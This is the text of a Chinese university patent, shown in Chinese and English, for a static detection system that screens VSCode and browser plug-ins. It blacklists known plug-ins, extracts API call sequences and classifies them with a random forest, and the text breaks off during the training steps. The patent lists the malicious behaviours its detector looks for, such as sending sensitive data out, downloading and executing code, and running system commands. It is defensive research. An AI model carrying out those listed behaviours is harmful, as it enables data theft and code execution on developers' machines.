+

CN117708813B - A security detection method and system for software development environment - Google Patents

A security detection method and system for software development environment Download PDF

Info

Publication number
CN117708813B
CN117708813B CN202311618733.7A CN202311618733A CN117708813B CN 117708813 B CN117708813 B CN 117708813B CN 202311618733 A CN202311618733 A CN 202311618733A CN 117708813 B CN117708813 B CN 117708813B
Authority
CN
China
Prior art keywords
plug
malicious
api call
ins
call sequence
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Active
Application number
CN202311618733.7A
Other languages
Chinese (zh)
Other versions
CN117708813A (en
Inventor
黄诚
李乐融
曾雨潼
余泓豪
徐建斌
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Sichuan University
Original Assignee
Sichuan University
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Sichuan University filed Critical Sichuan University
Priority to CN202311618733.7A priority Critical patent/CN117708813B/en
Publication of CN117708813A publication Critical patent/CN117708813A/en
Application granted granted Critical
Publication of CN117708813B publication Critical patent/CN117708813B/en
Active legal-status Critical Current
Anticipated expiration legal-status Critical

Links

Classifications

    • GPHYSICS
    • G06COMPUTING OR CALCULATING; COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures
    • G06F21/56Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/562Static detection
    • G06F21/563Static detection by source code analysis
    • GPHYSICS
    • G06COMPUTING OR CALCULATING; COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F18/00Pattern recognition
    • G06F18/20Analysing
    • G06F18/24Classification techniques
    • G06F18/243Classification techniques relating to the number of classes
    • G06F18/24323Tree-organised classifiers

Landscapes

  • Engineering & Computer Science (AREA)
  • Theoretical Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • General Engineering & Computer Science (AREA)
  • Data Mining & Analysis (AREA)
  • Physics & Mathematics (AREA)
  • Software Systems (AREA)
  • Computer Hardware Design (AREA)
  • General Physics & Mathematics (AREA)
  • Evolutionary Computation (AREA)
  • Bioinformatics & Computational Biology (AREA)
  • Health & Medical Sciences (AREA)
  • Life Sciences & Earth Sciences (AREA)
  • Bioinformatics & Cheminformatics (AREA)
  • Evolutionary Biology (AREA)
  • Artificial Intelligence (AREA)
  • General Health & Medical Sciences (AREA)
  • Virology (AREA)
  • Computer Vision & Pattern Recognition (AREA)
  • Stored Programmes (AREA)

Abstract

本发明公开了一种软件开发环境的安全性检测方法及系统,包括:对待检测的代码编辑器Visual Studio Code插件和浏览器插件进行黑名单筛查;对未在黑名单中的插件进行代码行为静态提取,使用抽象语法树结合正则表达式匹配来获取代码中的API调用序列;利用特征工程对恶意插件行为进行建模,并使用随机森林分类器静态检测插件的恶意性;对被判定为恶意的插件,利用层次化分类器进一步分类得到具体的恶意类别。本发明还提供实现上述方法的系统,该系统能够对开发环境中的浏览器插件和代码编辑器插件进行在线分析和本地扫描,实现了对两种类型插件的全面安全检测。本发明能够有效识别和精准分类插件的恶意行为,为软件开发者提供更全面的安全保护。

The present invention discloses a security detection method and system for a software development environment, including: blacklist screening of code editor Visual Studio Code plug-ins and browser plug-ins to be detected; static extraction of code behavior of plug-ins not in the blacklist, and use of abstract syntax tree combined with regular expression matching to obtain API call sequences in the code; modeling of malicious plug-in behavior using feature engineering, and static detection of the maliciousness of plug-ins using random forest classifiers; and further classification of plug-ins determined to be malicious using hierarchical classifiers to obtain specific malicious categories. The present invention also provides a system for implementing the above method, which can perform online analysis and local scanning of browser plug-ins and code editor plug-ins in the development environment, and realizes comprehensive security detection of the two types of plug-ins. The present invention can effectively identify and accurately classify malicious behaviors of plug-ins, and provide more comprehensive security protection for software developers.

Description

一种软件开发环境的安全性检测方法及系统A security detection method and system for software development environment

技术领域Technical Field

本发明涉及一种网络安全技术,尤其是指一种软件开发环境的安全性检测方法及系统。The present invention relates to a network security technology, and in particular to a security detection method and system for a software development environment.

背景技术Background technique

随着软件开发生态系统的不断扩大,开发者工具插件越来越多地被开发者使用,开发环境也越来越复杂,导致开发环境的安全性难以保证。攻击者可以借助软件开发环境中引入的恶意第三方插件,窃取开发环境中的敏感数据,导致数据泄露,也可能导致所开发出的程序被注入恶意代码,存在巨大的安全隐患。因此,检测开发者当前开发环境中存在的恶意插件,将有助于在开发工具这一环节为开发人员提供安全保障。As the software development ecosystem continues to expand, developer tool plug-ins are increasingly used by developers, and the development environment is becoming more and more complex, making it difficult to ensure the security of the development environment. Attackers can use malicious third-party plug-ins introduced into the software development environment to steal sensitive data in the development environment, resulting in data leakage, and may also cause the developed program to be injected with malicious code, posing a huge security risk. Therefore, detecting malicious plug-ins in the developer's current development environment will help provide security for developers in the development tool link.

现有技术中,尚没有对开发环境中的代码编辑器插件和浏览器插件进行全面扫描和检测的方法和系统。在浏览器插件安全检测方面,Cisco的Duo Security发布了CRXcavator,一个自动化Chrome扩展程序安全评估工具用户可以登录此平台,通过检索Chrome浏览器扩展程序的扩展名或者扩展ID,获得指定扩展的风险指数和分析报告,但存在以下缺点:用户只能够根据扩展名称和ID进行检索,无法对尚未检测的插件进行在线分析;平台限制大,无法对其他平台的插件进行检测;无法检测开发者本地环境中的插件安全性,无法对开发者环境安全提供保障。在恶意JavaScript代码检测方面,Aurore Fass等人提出了一种模块化的静态JavaScript检测系统JStap,利用代码控制流和数据流信息,在基于词法和基于抽象语法树的检测方式基础上进行了扩展,但该检测方法只能将代码分类为恶意和良性,而无法对代码具体的恶意行为实现进一步的精准分类。In the prior art, there is no method and system for comprehensive scanning and detection of code editor plug-ins and browser plug-ins in the development environment. In terms of browser plug-in security detection, Cisco's Duo Security released CRXcavator, an automated Chrome extension security assessment tool. Users can log in to this platform and retrieve the extension name or extension ID of the Chrome browser extension to obtain the risk index and analysis report of the specified extension. However, there are the following disadvantages: users can only search based on the extension name and ID, and cannot perform online analysis on plug-ins that have not been detected; the platform is highly restricted and cannot detect plug-ins on other platforms; it cannot detect the security of plug-ins in the developer's local environment and cannot provide security for the developer's environment. In terms of malicious JavaScript code detection, Aurore Fass et al. proposed a modular static JavaScript detection system JStap, which uses code control flow and data flow information to expand on the basis of lexical-based and abstract syntax tree-based detection methods, but this detection method can only classify code into malicious and benign, and cannot achieve further accurate classification of specific malicious behaviors of the code.

发明内容Summary of the invention

有鉴于此,本发明的目的是提供一种软件开发环境的安全性检测方法及系统,能够对开发者使用的代码编辑器Visual Studio Code(VSCode)插件和浏览器插件进行安全性分析;通过抽象语法树(AST)结合正则表达式的方式,能够准确提取API调用序列;通过对插件行为的建模,能够使模型高效地检测出恶意插件;通过从API到敏感行为到恶意插件类别的层次化分类器,实现对恶意插件的多分类精准检测,能够识别恶意插件的具体类别;能够对软件开发环境中的浏览器插件和代码编辑器插件进行在线分析和本地扫描,实现了对两种类型插件的全面安全检测,为开发人员提供安全保障。In view of this, the purpose of the present invention is to provide a security detection method and system for a software development environment, which can perform security analysis on the code editor Visual Studio Code (VSCode) plug-in and browser plug-in used by developers; through the combination of abstract syntax tree (AST) and regular expression, API call sequence can be accurately extracted; by modeling the plug-in behavior, the model can efficiently detect malicious plug-ins; through a hierarchical classifier from API to sensitive behavior to malicious plug-in category, multi-classification and accurate detection of malicious plug-ins is achieved, and the specific category of malicious plug-ins can be identified; browser plug-ins and code editor plug-ins in the software development environment can be analyzed online and scanned locally, realizing comprehensive security detection of the two types of plug-ins, and providing security protection for developers.

为了实现上述目的,本发明是通过如下的技术方案来实现的:In order to achieve the above object, the present invention is implemented by the following technical solutions:

本发明第一方面提供了一种软件开发环境的安全性检测方法,包括以下步骤:A first aspect of the present invention provides a method for detecting the security of a software development environment, comprising the following steps:

S100:对于待检测的VSCode插件和Web浏览器插件,进行黑名单筛查,以判断其是否属于已知的恶意插件;S100: For the VSCode plug-in and Web browser plug-in to be detected, blacklist screening is performed to determine whether they are known malicious plug-ins;

S200:对S100中不在恶意插件黑名单中的插件,进行代码行为静态提取,通过使用抽象语法树结合正则表达式匹配来高效地获取代码中的API调用序列;S200: For the plug-ins in S100 that are not in the malicious plug-in blacklist, perform static code behavior extraction, and efficiently obtain the API call sequence in the code by using the abstract syntax tree combined with regular expression matching;

S300:在S200步骤中提取的API调用序列基础上,通过特征工程对恶意插件行为进行建模,利用随机森林分类器静态检测插件的恶意性,将插件分类为恶意和良性;S300: Based on the API call sequence extracted in step S200, the malicious plug-in behavior is modeled through feature engineering, and the maliciousness of the plug-in is statically detected using a random forest classifier to classify the plug-in into malicious or benign.

S400:对S300中输出为恶意的插件,通过层次化分类器,将API调用序列映射为特定敏感行为,然后根据这些行为的前后顺序对恶意插件进行分类,得到恶意插件类别。S400: For the plug-in output as malicious in S300, the API call sequence is mapped to specific sensitive behaviors through a hierarchical classifier, and then the malicious plug-in is classified according to the sequence of these behaviors to obtain a malicious plug-in category.

优选的,所述S100中,基于黑名单的恶意插件检测步骤具体包括:Preferably, in S100, the blacklist-based malicious plug-in detection step specifically includes:

S110:从互联网收集公认的恶意插件数据,整合本发明通过检测流程检测并验证的恶意插件信息,构建恶意插件黑名单,定期同步最新发现的恶意插件信息,以保证黑名单内容的全面性和时效性;S110: Collecting recognized malicious plug-in data from the Internet, integrating the malicious plug-in information detected and verified by the detection process of the present invention, building a malicious plug-in blacklist, and regularly synchronizing the latest malicious plug-in information to ensure the comprehensiveness and timeliness of the blacklist content;

S120:用在步骤S110中构建的黑名单,对待检测插件的唯一标识符(ID)进行查询,若该ID存在于黑名单中,该插件则被标记为恶意插件。S120: Use the blacklist constructed in step S110 to query the unique identifier (ID) of the plug-in to be detected. If the ID exists in the blacklist, the plug-in is marked as a malicious plug-in.

优选的,所述S200中,插件代码行为静态提取步骤具体包括:Preferably, in S200, the step of statically extracting the plug-in code behavior specifically includes:

S210:首先尝试使用抽象语法树对源代码进行解析,通过遍历生成的抽象语法树获取API调用序列;S210: first try to parse the source code using an abstract syntax tree, and obtain an API call sequence by traversing the generated abstract syntax tree;

S220:若抽象语法树的生成失败,启用正则匹配作为备用方案,首先识别源代码中所有的敏感API调用,再通过特定的算法对API调用进行排序。S220: If the generation of the abstract syntax tree fails, regular matching is enabled as a backup solution. First, all sensitive API calls in the source code are identified, and then the API calls are sorted using a specific algorithm.

优选的,所述利用抽象语法树获取API调用序列的步骤中,具体包括:Preferably, the step of obtaining the API call sequence by using the abstract syntax tree specifically includes:

S211:采用语法解析器将源代码解析为抽象语法树;S211: Use a syntax parser to parse the source code into an abstract syntax tree;

S212:层次遍历生成的抽象语法树获取自定义函数声明子树以及剩余代码子树,并分别将其入队;S212: The abstract syntax tree generated by the hierarchical traversal is obtained by obtaining a custom function declaration subtree and a remaining code subtree, and queues them respectively;

S213:对自定义函数声明子树队列,依此对其执行出队操作,并采用前序遍历出队的子树获取敏感API调用。若自定义函数内存在自定义函数的调用,同时其已遍历完,则将其API调用序列插入调用的函数的API调用序列中;若被调用的自定义函数未更新完,将该子树重新入队。对于API调用序列获取完毕的自定义函数,则将其标记为已更新,这个过程直至所有的自定义函数的API调用顺序更新完毕;S213: Declare a subtree queue for the custom function, perform dequeue operations on it accordingly, and use pre-order traversal to obtain sensitive API calls from the dequeued subtree. If there are calls to custom functions within the custom function and it has been traversed, insert its API call sequence into the API call sequence of the called function; if the called custom function has not been updated, re-queue the subtree. For custom functions whose API call sequence has been obtained, mark them as updated, and this process continues until the API call sequence of all custom functions has been updated;

S214:对剩余代码子树队列,依次对其执行出队操作,并采用前序遍历出队的子树获取敏感API调用,若遍历到的当前结点为自定义函数的调用,将自定义函数的有序API调用序列从后插入源文件API调用序列;S214: Dequeue the remaining code subtree queues in turn, and traverse the dequeued subtrees in pre-order to obtain sensitive API calls. If the current node traversed is a call of a custom function, insert the ordered API call sequence of the custom function into the source file API call sequence from the end;

S215:重复S213和S214直到自定义函数声明子树队列和剩余代码子树队列为空,输出API调用序列。S215: Repeat S213 and S214 until the custom function declaration subtree queue and the remaining code subtree queue are empty, and output the API call sequence.

优选的,所述利用正则匹配获取API调用序列的步骤中,具体包括:Preferably, the step of obtaining the API call sequence by using regular matching specifically includes:

S221:采用正则匹配的方式匹配函数定义块的文本范围;S221: Match the text range of the function definition block by using regular matching;

S222:识别源文件中所有的敏感API调用,并采用选择排序根据API调用的文本相对位置进行排序;S222: Identify all sensitive API calls in the source file, and sort them according to the relative positions of the texts of the API calls using selection sorting;

S223:将位于函数定义块内的API调用加入自定义函数对应的函数调用序列;S223: adding the API call in the function definition block to the function call sequence corresponding to the user-defined function;

S224:递归更新自定义函数的API调用序列,做法是将其定义块内调用的函数的排序好的API调用序列插入其自身的API调用序列,直到所有的自定义函数都更新完毕;S224: recursively updating the API call sequence of the user-defined function by inserting the sorted API call sequence of the function called in its definition block into its own API call sequence until all the user-defined functions are updated;

S225:在源文件的API调用序列中移除所有位于函数定义块内的API调用;S225: removing all API calls located in the function definition block in the API call sequence of the source file;

S226:识别源文件中自定义函数的调用,根据其调用位置将其API调用序列插入源文件的API调用序列中。S226: Identify the call of the custom function in the source file, and insert its API call sequence into the API call sequence of the source file according to its call position.

优选的,所述S300中,插件恶意性静态检测步骤具体包括:Preferably, in S300, the static detection step of maliciousness of the plug-in specifically includes:

S310:根据对恶意插件样本的分析,定义用于判断插件是否存在可疑行为的行为序列特征,每个特征是多个行为的有序组合,代表一种特定的敏感行为;S310: Based on the analysis of the malicious plug-in sample, a behavior sequence feature is defined for determining whether the plug-in has suspicious behavior. Each feature is an ordered combination of multiple behaviors and represents a specific sensitive behavior.

S320:将S200中提取的API调用序列映射为行为序列特征向量;S320: Mapping the API call sequence extracted in S200 into a behavior sequence feature vector;

S330:将特征向量送入训练好的随机森林分类器中进行预测,随机森林由多个决策树组成,它们各自对特征向量进行评估,并以投票的方式决定最终的分类结果。S330: Send the feature vector to the trained random forest classifier for prediction. The random forest consists of multiple decision trees, which each evaluates the feature vector and decides the final classification result by voting.

优选的,所述随机森林分类器的训练方法是:Preferably, the training method of the random forest classifier is:

S331:构建了一个数据集,包含良性样本和恶意样本;S331: A dataset was constructed, which includes benign and malicious samples;

S332:利用静态分析方法,从数据集中提取出定义好的行为序列特征,形成一个行为特征矩阵;S332: Using static analysis methods, extract defined behavior sequence features from the data set to form a behavior feature matrix;

S333:将整个数据集按照8:2的比例分为训练集和测试集,用于模型训练和评估;S333: Divide the entire data set into a training set and a test set in a ratio of 8:2 for model training and evaluation;

S334:通过对训练数据集进行随机采样,为每个采样得到的特征集构建决策树,每棵树通过选择最佳特征进行分割以提高节点纯度;S334: By randomly sampling the training data set, a decision tree is constructed for each sampled feature set, and each tree is split by selecting the best feature to improve the node purity;

S335:采用网格搜索方法来遍历随机森林模型的关键参数,包括分类器个数和决策树深度,以选取最优化模型参数;S335: Using a grid search method to traverse the key parameters of the random forest model, including the number of classifiers and the depth of the decision tree, to select the optimal model parameters;

S336:对模型在测试集上的性能进行评估,并保存表现最佳的模型,供未来预测任务使用。S336: Evaluate the performance of the model on the test set and save the best performing model for future prediction tasks.

本发明还提供了一种软件开发环境的安全性检测系统,包括:The present invention also provides a security detection system for a software development environment, comprising:

用户交互与安全态势模块:用于提供交互式界面以搜索、上传待检测插件或扫描本地安装的插件,并展示开发环境的安全状态、检测结果和历史检测记录;User interaction and security situation module: used to provide an interactive interface to search, upload plug-ins to be tested or scan locally installed plug-ins, and display the security status, test results and historical test records of the development environment;

插件信息获取模块:用于自动采集插件市场或平台上的插件源代码,为安全性分析提供数据基础;Plugin information acquisition module: used to automatically collect plugin source code on the plugin market or platform to provide a data basis for security analysis;

客户端本地开发环境安全性检测模块:用于在用户端运行,自动扫描指定的插件安装路径,获取本地开发环境安装的VSCode插件和浏览器插件;Client local development environment security detection module: used to run on the user side, automatically scan the specified plug-in installation path, and obtain the VSCode plug-in and browser plug-in installed in the local development environment;

插件恶意性静态检测模块:用于通过使用抽象语法树结合正则表达式匹配提取API调用序列,并使用随机森林模型判定插件的恶意性;Plugin malicious static detection module: used to extract API call sequences by using abstract syntax trees combined with regular expression matching, and use random forest models to determine the maliciousness of plugins;

插件恶意行为判定模块:用于判定恶意插件的类别,对于被初步判定为恶意的插件,此模块通过层次化分类器,将API调用序列映射为特定敏感行为,然后根据这些行为的前后顺序对恶意插件进行分类,得到恶意插件类别;Plug-in malicious behavior determination module: used to determine the category of malicious plug-ins. For plug-ins that are initially determined to be malicious, this module uses a hierarchical classifier to map the API call sequence to specific sensitive behaviors, and then classifies the malicious plug-ins according to the order of these behaviors to obtain the malicious plug-in category;

用户管理模块:用于处理用户的注册、登录和权限验证,确保个性化安全状态和历史检测数据的安全访问;User management module: used to process user registration, login and permission verification, ensuring secure access to personalized security status and historical detection data;

数据存储模块:用于存储所有数据,包括插件信息、检测结果、用户配置和系统日志,确保数据的安全性和完整性。Data storage module: used to store all data, including plug-in information, test results, user configuration and system logs, to ensure data security and integrity.

本发明同现有技术相比,其有益效果表现为:通过综合利用静态代码分析、机器学习分类和层次化行为分类技术,本发明提供了一种全面和精准的开发环境安全性检测方法,与现有技术相比,它能够更有效地识别恶意插件并对恶意行为类别实现多分类精准检测,为开发者的代码编辑器和浏览器提供更全面的安全保障。Compared with the prior art, the beneficial effects of the present invention are as follows: by comprehensively utilizing static code analysis, machine learning classification and hierarchical behavior classification technology, the present invention provides a comprehensive and accurate development environment security detection method. Compared with the prior art, it can more effectively identify malicious plug-ins and realize multi-classification and accurate detection of malicious behavior categories, providing more comprehensive security protection for developers' code editors and browsers.

附图说明BRIEF DESCRIPTION OF THE DRAWINGS

图1是本发明的第一实施例中的总体流程图;FIG1 is an overall flow chart of a first embodiment of the present invention;

图2是本发明的第一实施例中利用抽象语法树获取API调用序列的流程图;2 is a flow chart of obtaining an API call sequence by using an abstract syntax tree in the first embodiment of the present invention;

图3是本发明的第一实施例中利用正则匹配获取API调用序列的流程图;3 is a flow chart of obtaining an API call sequence by using regular expression matching in the first embodiment of the present invention;

图4是本发明的第二实施例中的系统结构图;FIG4 is a system structure diagram of a second embodiment of the present invention;

图5是本发明的第二实施例中的系统流程图。FIG. 5 is a system flow chart of the second embodiment of the present invention.

具体实施方式Detailed ways

下面结合附图和具体实施方式对本发明的具体实施方式做进一步详细描述。以下实施例或者附图用于说明本发明,但不用来限制本发明的范围。The specific implementation of the present invention is further described in detail below in conjunction with the accompanying drawings and specific implementations. The following examples or drawings are used to illustrate the present invention, but are not used to limit the scope of the present invention.

实施例一:Embodiment 1:

一种软件开发环境的安全性检测方法,参见图1,包括以下步骤:A method for detecting the security of a software development environment, as shown in FIG1 , comprises the following steps:

S100:对于待检测的VSCode插件和Web浏览器插件,进行黑名单筛查,以判断其是否属于已知的恶意插件。S100: For the VSCode plug-in and Web browser plug-in to be detected, blacklist screening is performed to determine whether they are known malicious plug-ins.

在一个实施例中,所述S100包括以下步骤:In one embodiment, the S100 includes the following steps:

S110:从互联网收集公认的恶意插件数据,整合本发明通过检测流程检测并验证的恶意插件信息,构建恶意插件黑名单,定期同步最新发现的恶意插件信息,以保证黑名单内容的全面性和时效性。S110: Collecting recognized malicious plug-in data from the Internet, integrating the malicious plug-in information detected and verified by the detection process of the present invention, building a malicious plug-in blacklist, and regularly synchronizing the latest malicious plug-in information to ensure the comprehensiveness and timeliness of the blacklist content.

所述互联网恶意插件数据收集来源包括知名安全公司Snyk、Kaspersky和Threatmon公开的样本;相较于现有方案,本实施例中不仅在互联网上进行了多方面的数据收集,还在已互联网已公开数据的基础上加入了本实施例对VSCode和浏览器插件检测过程中检出并确认的恶意插件数据,更能够解决单一数据来源的覆盖范围不全面、描述角度不宽泛、描述内容不充分和数据更新不及时的问题。The sources of Internet malicious plug-in data collection include samples publicly disclosed by well-known security companies Snyk, Kaspersky and Threatmon. Compared with the existing solutions, this embodiment not only collects data from multiple aspects on the Internet, but also adds malicious plug-in data detected and confirmed during the VSCode and browser plug-in detection process of this embodiment to the publicly disclosed data on the Internet, which can better solve the problems of incomplete coverage, narrow description angle, insufficient description content and untimely data update of a single data source.

S120:利用在步骤S110中构建的黑名单,对待检测插件的唯一标识符(ID)进行查询,若该ID存在于黑名单中,该插件则被标记为恶意插件。S120: Using the blacklist constructed in step S110, query the unique identifier (ID) of the plug-in to be detected. If the ID exists in the blacklist, the plug-in is marked as a malicious plug-in.

S200:对S100中不在恶意插件黑名单中的插件,进行代码行为静态提取,通过使用抽象语法树结合正则表达式匹配来高效地获取代码中的API调用序列。S200: For the plug-ins in S100 that are not in the malicious plug-in blacklist, perform static code behavior extraction, and efficiently obtain the API call sequence in the code by using the abstract syntax tree combined with regular expression matching.

具体而言,本实施例中采取“以抽象语法树为主,正则表达式匹配为辅”的策略,以充分利用抽象语法树在进行精确的语法分析和敏感API调用识别方面的优势。由于JavaScript语法的多样性和解析工具的固有局限性,当常规句法分析遇到障碍时,将正则表达式匹配作为有效的补充,以弥补抽象语法树在某些复杂语法结构解析上的不足。相较于现有技术,本实施例提取API调用序列的方法确保了对各种编码风格和模式的广泛兼容性,能够处理连续的迭代和递归,进一步增强了对嵌套和复杂函数结构的分析能力。Specifically, the strategy of "abstract syntax tree as the main method and regular expression matching as the auxiliary method" is adopted in this embodiment to make full use of the advantages of abstract syntax tree in performing precise syntax analysis and identifying sensitive API calls. Due to the diversity of JavaScript syntax and the inherent limitations of parsing tools, when conventional syntactic analysis encounters obstacles, regular expression matching is used as an effective supplement to make up for the shortcomings of abstract syntax tree in parsing certain complex grammatical structures. Compared with the prior art, the method of extracting API call sequences in this embodiment ensures wide compatibility with various coding styles and patterns, can handle continuous iterations and recursion, and further enhances the analysis capabilities of nested and complex function structures.

在一个实施例中,所述S200包括以下步骤:In one embodiment, the S200 includes the following steps:

S210:首先尝试使用抽象语法树对源代码进行解析,通过遍历生成的抽象语法树获取API调用序列。S210: First, try to parse the source code using an abstract syntax tree, and obtain the API call sequence by traversing the generated abstract syntax tree.

在抽象语法树遍历的过程中,考虑到在函数声明块中的API调用结点不会在其声明的位置执行,因此在解析抽象语法树的时候将子树分为了两类:一类子树专门代表自定义函数声明块,剩余的其它子树归类为第二类子树。通过遍历第二类子树获取的API调用序列代表了代码在实际执行情况下的API调用顺序。对于自定义函数的处理,采取与第二类子树同样的遍历顺序遍历自定义函数子树,更新自定义函数的有序API调用序列,并在其调用时插入排序好的API调用序列中。In the process of traversing the abstract syntax tree, considering that the API call nodes in the function declaration block will not be executed at the location where they are declared, the subtrees are divided into two categories when parsing the abstract syntax tree: one subtree specifically represents the custom function declaration block, and the remaining subtrees are classified as the second subtree. The API call sequence obtained by traversing the second subtree represents the API call sequence of the code under actual execution. For the processing of custom functions, the custom function subtree is traversed in the same traversal order as the second subtree, the ordered API call sequence of the custom function is updated, and inserted into the sorted API call sequence when it is called.

参见图2,在一个实施例中,所述利用抽象语法树获取API调用序列包括以下步骤:Referring to FIG. 2 , in one embodiment, the method of obtaining an API call sequence using an abstract syntax tree includes the following steps:

S211:采用语法解析器将源代码解析为抽象语法树。S211: Use a syntax parser to parse the source code into an abstract syntax tree.

具体的,所述语法解析器为Esprima,一个流行的、高性能的ECMAScript解析器。Specifically, the syntax parser is Esprima, a popular, high-performance ECMAScript parser.

S212:层次遍历生成的抽象语法树获取自定义函数声明子树以及剩余代码子树,并分别将其入队。S212: The abstract syntax tree generated by the hierarchical traversal obtains the custom function declaration subtree and the remaining code subtree, and queues them respectively.

S213:对自定义函数声明子树队列,依次对其执行出队操作,并采用前序遍历出队的子树获取敏感API调用;若自定义函数内存在自定义函数的调用,同时其已遍历完,则将其API调用序列插入调用的函数的API调用序列中;若被调用的自定义函数未更新完,将该子树重新入队;对于API调用序列获取完毕的自定义函数,则将其标记为已更新,这个过程直至所有的自定义函数的API调用顺序更新完毕。S213: declare a subtree queue for the custom function, perform dequeue operations on it in turn, and use pre-order traversal to traverse the dequeued subtree to obtain sensitive API calls; if there are calls to custom functions within the custom function and it has been traversed, insert its API call sequence into the API call sequence of the called function; if the called custom function has not been updated, re-queue the subtree; for the custom function whose API call sequence has been obtained, mark it as updated, and this process continues until the API call sequence of all custom functions has been updated.

S214:对剩余代码子树队列,依次对其执行出队操作,并采用前序遍历出队的子树获取敏感API调用,若遍历到的当前结点为自定义函数的调用,将自定义函数的有序API调用序列从后插入源文件API调用序列。S214: Dequeue the remaining code subtree queues in turn, and traverse the dequeued subtrees in pre-order to obtain sensitive API calls. If the current node traversed is a call of a custom function, insert the ordered API call sequence of the custom function into the source file API call sequence from the back.

S215:重复S213和S214直到自定义函数声明子树队列和剩余代码子树队列为空,输出API调用序列。S215: Repeat S213 and S214 until the custom function declaration subtree queue and the remaining code subtree queue are empty, and output the API call sequence.

S220:若抽象语法树的生成失败,启用正则匹配作为备用方案,首先识别源代码中所有的敏感API调用,再通过特定的算法对API调用进行排序。S220: If the generation of the abstract syntax tree fails, regular matching is enabled as a backup solution. First, all sensitive API calls in the source code are identified, and then the API calls are sorted using a specific algorithm.

参见图3,在一个实施例中,所述利用正则匹配获取API调用序列包括以下步骤:Referring to FIG. 3 , in one embodiment, the method of obtaining an API call sequence by using regular expression matching includes the following steps:

S221:采用正则匹配的方式匹配函数定义块的文本范围。S221: Match the text range of the function definition block using a regular matching method.

S222:识别源文件中所有的敏感API调用,并采用选择排序根据API调用的文本相对位置进行排序。S222: Identify all sensitive API calls in the source file, and sort them according to the relative positions of the texts of the API calls using selection sorting.

S223:将位于函数定义块内的API调用加入自定义函数对应的函数调用序列。S223: Add the API call in the function definition block to the function call sequence corresponding to the user-defined function.

S224:递归更新自定义函数的API调用序列,做法是将其定义块内调用的函数的排序好的API调用序列插入其自身的API调用序列,直到所有的自定义函数都更新完毕。S224: recursively update the API call sequence of the user-defined function by inserting the sorted API call sequence of the function called in its definition block into its own API call sequence until all user-defined functions are updated.

S225:在源文件的API调用序列中移除所有位于函数定义块内的API调用。S225: Remove all API calls located in the function definition block from the API call sequence of the source file.

S226:识别源文件中自定义函数的调用,根据其调用位置将其API调用序列插入源文件的API调用序列中。S226: Identify the call of the custom function in the source file, and insert its API call sequence into the API call sequence of the source file according to its call position.

S300:在S200步骤中提取的API调用序列基础上,通过特征工程对恶意插件行为进行建模,利用随机森林分类器静态检测插件的恶意性,将插件分类为恶意和良性。S300: Based on the API call sequence extracted in step S200, the malicious plug-in behavior is modeled through feature engineering, and the maliciousness of the plug-in is statically detected using a random forest classifier, and the plug-in is classified into malicious and benign.

实际生产环境下,恶意插件的占比是极低的,因此通过静态检测对插件进行初步的恶意性判定,快速排除大部分正常插件,能够减少大量的资源消耗和检测时延,提高检测效率。In the actual production environment, the proportion of malicious plug-ins is extremely low. Therefore, static detection can be used to make preliminary malicious judgments on the plug-ins and quickly exclude most normal plug-ins, which can reduce a lot of resource consumption and detection delays and improve detection efficiency.

在一个实施例中,所述静态检测插件恶意性包括以下步骤:In one embodiment, the static detection of plugin maliciousness includes the following steps:

S310:根据对恶意插件样本的分析,定义用于判断插件是否存在可疑行为的行为序列特征,每个特征是多个行为的有序组合,代表一种特定的敏感行为。S310: Based on the analysis of malicious plug-in samples, a behavior sequence feature is defined for determining whether the plug-in has suspicious behavior. Each feature is an ordered combination of multiple behaviors and represents a specific sensitive behavior.

例如,一个可行的行为序列特征包括:外发敏感信息、查询系统环境变量、下载内容并执行、写入文件并执行、读取文件内容并执行、读取文件并动态执行代码、修改文件权限并创建进程、识别操作系统平台、修改系统命令执行结果的数据流、执行系统命令、执行敏感的文件操作。每个行为序列特征是多个行为的组合,例如,外发敏感信息这一行为序列包括两个行为,先执行访问敏感信息,再执行网络请求外发。For example, a feasible behavior sequence feature includes: sending sensitive information, querying system environment variables, downloading content and executing, writing files and executing, reading file content and executing, reading files and dynamically executing code, modifying file permissions and creating processes, identifying operating system platforms, modifying the data flow of system command execution results, executing system commands, and performing sensitive file operations. Each behavior sequence feature is a combination of multiple behaviors. For example, the behavior sequence of sending sensitive information includes two behaviors: first, accessing sensitive information, and then sending network requests.

S320:将S200中提取的API调用序列映射为行为序列特征向量。S320: Map the API call sequence extracted in S200 into a behavior sequence feature vector.

S330:将特征向量送入训练好的随机森林分类器中进行预测,随机森林由多个决策树组成,它们各自对特征向量进行评估,并以投票的方式决定最终的分类结果。S330: Send the feature vector to the trained random forest classifier for prediction. The random forest consists of multiple decision trees, which each evaluates the feature vector and decides the final classification result by voting.

优选的,所述随机森林分类器的训练方法是:Preferably, the training method of the random forest classifier is:

S331:构建了一个数据集,包含良性样本和恶意样本。S331: A dataset was constructed, which contains both benign and malicious samples.

具体的,一个可行的数据集构建方法为,从知名安全公司Snyk、Kaspersky和Threatmon公开的恶意插件信息中选取恶意样本,从官方插件市场的排行榜中选取下载量大且用户评分高的样本作为良性样本。Specifically, a feasible method for constructing a dataset is to select malicious samples from the malicious plug-in information disclosed by well-known security companies Snyk, Kaspersky, and Threatmon, and select samples with large downloads and high user ratings from the official plug-in market rankings as benign samples.

S332:利用静态分析方法,从数据集中提取出定义好的行为序列特征,形成一个行为特征矩阵。S332: Using static analysis methods, defined behavior sequence features are extracted from the data set to form a behavior feature matrix.

S333:将整个数据集按照8:2的比例分为训练集和测试集,以便于模型训练和评估。S333: Divide the entire dataset into training set and test set in a ratio of 8:2 to facilitate model training and evaluation.

S334:通过对训练数据集进行随机采样,为每个采样得到的特征集构建决策树,每棵树通过选择最佳特征进行分割以提高节点纯度。S334: By randomly sampling the training data set, a decision tree is constructed for each sampled feature set, and each tree is split by selecting the best feature to improve the node purity.

